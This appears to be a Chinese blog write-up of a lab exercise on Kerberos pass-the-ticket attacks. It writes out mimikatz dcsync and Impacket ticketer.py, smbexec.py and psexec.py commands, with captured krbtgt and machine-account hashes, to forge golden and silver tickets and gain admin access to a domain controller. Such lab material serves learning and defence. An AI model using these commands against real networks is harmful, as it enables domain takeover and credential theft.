PTT 实验

news/2024/10/3 13:29:42 标签: windows

1. 实验网络拓扑

kali: 
192.168.72.128

win2008:
192.168.135.129
192.168.72.139

win7:
192.168.72.149

win2012:(DC)
192.168.72.131	

2. EXPLOIT

一般来说,通用的ptt有三种方法:

  • impacket
  • mimikatz
  • cs

这里就以impacket为例。

0x1. 黄金票据

前提条件

  • krbtgt hash
  • 域的SID
  • 域名
  • 要伪造的域用户。(一般为域管)

1)获取krbtgt hash

(也可以用imacket的secretsdump.py)

lsadump::dcsync /user:krbtgt /csv

在这里插入图片描述

f4567f841a05d9d5f45f1ffd46c9b920

2)获取域的SID

在这里插入图片描述

S-1-5-21-4207503543-408938341-706816591

3).4)……

Impacket/ticketer.py

用Impacket的,结合后面的smbexec.py这些利用导入票据更方便。

制作黄金票据:

python3 ticketer.py -domain-sid S-1-5-21-4207503543-408938341-706816591 -nthash f4567f841a05d9d5f45f1ffd46c9b920 -domain intranet.com administrator

在这里插入图片描述

然后导入票据,smbexec.py连接域控,验证票据权限:

export KRB5CCNAME=administrator.ccache
python3 smbexec.py -no-pass -l administrator@dc.intranet.com -dc-ip 192.168.72.131

要注意:先在kali上配置好hosts,因为用的Kerberos走域名,不能写@ip。

在这里插入图片描述

当然,用psexec.py也行:

在这里插入图片描述

0x2 白银票据

前提条件

  • 服务HASH
  • 域SID
  • 域名
  • 域管名

1)服务HASH

比如我们通过kerberoasting拿到了服务的密码,就可以计算出服务的NTLM HASH。

这个实验以DC的CIFS服务为例,那么hash就是DC$机器用户的hash了,mimikatz抓取:

在这里插入图片描述

b4c5166e6894457fe007c66c1259644b

2)域SID

同金票

S-1-5-21-4207503543-408938341-706816591

3)域名

同。

4)域管名

一般为administrator

Impacket/ticketer.py

python3 ticketer.py -domain-sid S-1-5-21-4207503543-408938341-706816591 -nthash b4c5166e6894457fe007c66c1259644b -spn cifs/DC.intranet.com -domain intranet.com administrator

制作后,导入,连接域控:

在这里插入图片描述

同样的,也有权限进行secretsdump.py操作:

在这里插入图片描述


http://www.niftyadmin.cn/n/5688462.html

相关文章

rabbitmq----数据管理模块

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 交换机数据管理管理的字段持久化管理类内存管理类申明交换机删除交换机获取指定交换机 队列数据管理管理的字段持久化管理类内存管理类申明/删除/获取指定队列获取所…

some 蓝桥杯题

12.反异或01串 - 蓝桥云课 (lanqiao.cn) #include "bits/stdc.h" #define int long long using namespace std; char c[10000000]; char s[10000000]; int cnt,Ans,mr,mid; int maxi; int p[10000000],pre[10000000]; signed main() {ios::sync_with_stdio(0);cin.t…

基于Spring Boot+Unipp的中考体测训练小程序(协同过滤算法、图形化分析)【原创】

🎈系统亮点:协同过滤算法、图形化分析; 一.系统开发工具与环境搭建 1.系统设计开发工具 后端使用Java编程语言的Spring boot框架 项目架构:B/S架构 运行环境:win10/win11、jdk17 前端: 技术:框…

爬虫设计思考之一

爬虫设计思考之一 经常做爬虫的人对于技术比较的执着,尤其是本身从事的擅长的技术领域,从而容易忽视与之相近或者相似的技术。因此我建议大家在遇到此类问题的时候,可以采用对比分析的方式来理解。 本次的思考是基于国内最大的中文搜索引擎百…

WDG看门狗在stm32中的应用

一,WDG看门狗的介绍 看门狗可以监控程序的运行状态,当程序因为设计漏洞、硬件故障、电磁干扰等原因,出现卡死或跑飞现象时,看门狗能及时复位程序,避免程序陷入长时间的罢工状态,保证系统的可靠性和安全性看…

Nginx基础详解5(nginx集群、四七层的负载均衡、Jmeter工具的使用、实验验证集群的性能与单节点的性能)

续Nginx基础详解4(location模块、nginx跨域问题的解决、nginx防盗链的设计原理及应用、nginx模块化解剖)-CSDN博客 目录 14.nginx集群(前传) 14.1如何理解单节点和集群的概念 14.2单节点和集群的比较 14.3Nginx中的负载均衡…

C++平台跳跃游戏

目录 开头程序Game.cpp源文件Player.h头文件Player.cpp源文件 程序的流程图程序游玩的效果下一篇博客要说的东西 开头 大家好&#xff0c;我叫这是我58。 程序 Game.cpp源文件 #include <iostream> #include "Player.h" using namespace std; void printma…

华为杯”第十二届中国研究生数学建模竞赛-D题:单/多列车优化决策问题的研究

目录 摘 要: 一、问题叙述 1.1 研究背景 1.2 要解决的问题 二、基本假设、名词约定及符号说明 2.1 模型假设 2.2 名词约定 2.3 符号说明 三、问题分析与模型准备 3.1 问题分析 3.2 数据处理 3.3 模型准备 3.3.1 列车运行动力学模型 3.3.2 列车运行耗能模型 四、问题一模型建立…